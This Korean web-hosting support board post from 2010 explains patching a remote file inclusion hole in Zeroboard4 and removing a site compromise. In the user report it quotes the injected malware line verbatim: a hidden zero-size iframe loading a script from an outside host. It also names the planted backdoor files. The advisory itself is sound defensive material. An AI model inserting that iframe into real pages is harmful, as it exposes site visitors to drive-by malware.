마루웹호스팅 :: 웹호스팅, 도메인 등록, 쇼핑몰 호스팅, 이미지 링크, 서버 호스팅, 코로케이션, 서버관리툴, 리셀러, 홈페이지 제작, 무료호스팅 제공
140-008-011577
 
140-008-011577
입금확인신청 신청현황보기

고객지원센터

1:1 문의하기
  • AM 09:00 ~ PM 06:00
  • AM 11:30 ~ PM 01:00

Q&A 게시판



  2010년 12월 22일 RFI 취약점 보안 패치
  김병윤   2010-12-22 16:29:23 21704 

2010년 12월 22일 RFI 취약점 보안 패치

1. bbs/icon 폴더에 생성된 group_qazwsxedc.jpg, visitLog.php 파일 삭제
2. html, php 파일에 삽입된 iframe 소스 삭제
3. 관리자 페이지를 통해 qazwsxedc 그룹 삭제
4. 제로보드설치폴더/_head.php 파일의 13번째 줄 소스 변경(공식 보안 패치 페이지 참고)
5. 제로보드설치폴더/skin/zero_vote/ask_password.php / error.php / login.php 파일의 2번째 줄 소스 각각 변경(공식 보안 패치 페이지 참고)

※ 제로보드 공식 보안 패치
http://www.xpressengine.com/zb4_security/19346851

제로보드4 pl9 버전에서 RFI (원격파일 인클루드) 취약점이 발견되었습니다.

장경칩님께서 제보해주신 내용입니다.

_head.php 파일과 skin/zero_vote/*.php 파일에 대해 아래 내용으로 코드 수정을 통한 패치를 권드립니다.

_head.php

[수정전]

_head.php
view sourceprint?13.if(eregi(":\/\/",$_zb_path)||eregi("\.\.",$_zb_path)||eregi("^\/",$_zb_path)||eregi("data:;",$_zb_path)) $_zb_path ="./";

[수정후]

_head.php: 문자가 $_zb_path에 포함되지 않도록 수정
view sourceprint?13.if(eregi(":\/\/",$_zb_path)||eregi("\.\.",$_zb_path)||eregi("^\/",$_zb_path)||eregi("data:;",$_zb_path)||eregi(":",$_zb_path)) $_zb_path ="./";


skin/zero_vote/ 디렉토리의 아래에 해당되는 .php 파일

        - ask_password.php

        - error.php

        - login.php

[수정전]

./skin/zero_vote/ask_password.php, error.php, login.php
view sourceprint?2.if(eregi(":\/\/",$dir)||eregi("\.\.",$dir)||eregi("^\/",$dir)||eregi("data:;",$dir)) $dir ="./";

[수정후]

./skin/zero_vote/ask_password.php, error.php, login.php
view sourceprint?2.if(eregi(":\/\/",$dir)||eregi("\.\.",$dir)||eregi("^\/",$dir)||eregi("data:;",$dir)||eregi(":",$dir)) $dir ="./";

--------------------------------------------------------------------------------------------



이번달 중순 경부터 악성 웹변조가 있었습니다.

제 사이트도 물론 당했구요.

증상은 main과 index를 포함한 .html .php 파일 하단에 아래 악성코드가 심어집니다.
<iframe src="http://h.nexprice.com/css/x.htm" width=0 height=0></iframe>

저 같은 경우 config.php lib.php 파일에도 iframe 삽입 되어 있었습니다.

그리고, bbs/icon 폴더에 group_qazwsxedc.jpg, visitLog.php 파일이 생성되구요.

★ data 폴더에는 visitLog.php 파일만 생성되어 있었구요.

또한 최고관리자 로그인 후 그룹별 헤더 인크루드 부분에서 iframe 태그가 삽입이 됨니다.


악성코드가 심어진 사이트 접속하면 무한로딩이나 저질로딩(^^;) 또는 바이러스 감지됨니다.

그전에 패치 해주면 좋겠죠..^^

참고로 제로보드4에만 해당됨니다.




안녕하세요 마루인터넷입니다,

좋은 정보 감사합니다.
2010-12-22
 


14  php 소스가 그대로 보여요.      김병윤 2003/12/11 11782
13  계정 비밀번호를 변경하고 싶습니다 .  [1]    안재복 2006/06/01 12040
 홈페이지 변조(악성코드)에 따른 대처법       2009/09/18 13172
 해외고객을 위한 페이팔(Paypal)결제 안내.       2007/11/08 13327
10  DNS 설정 업데이트 요청  [3]    박찬호 2018/11/05 14312
9  해외에서 접속이 불안정 합니다.  [1]    권오훈 2007/10/14 14982
8  독립도메인 포워딩에 대해 여쭤봅니다.      김시찬 2003/12/05 16357
7  mysql 검색 실행시  [1]    토리세상 2008/12/04 16989
6  도메인..  [2]    변유석 2013/01/07 18075
5  대부분의 게시판이 안됩니다.      추연석 2004/02/16 20784
 2010년 12월 22일 RFI 취약점 보안 패치  [1]    김병윤 2010/12/22 21704
3  txt 업로드 게속 요청합니다  [1]    웰어스 2015/09/01 23757
2  C로 만들어진 된 이지보드가 작동하지 않습니다.  [4]    김형태 2009/03/20 27862
1  파일 업로드 에러 서버 설정 상의 문제인 것 같은데요  [1]    배형진 2007/08/07 41614

 [1]..[591][592] 593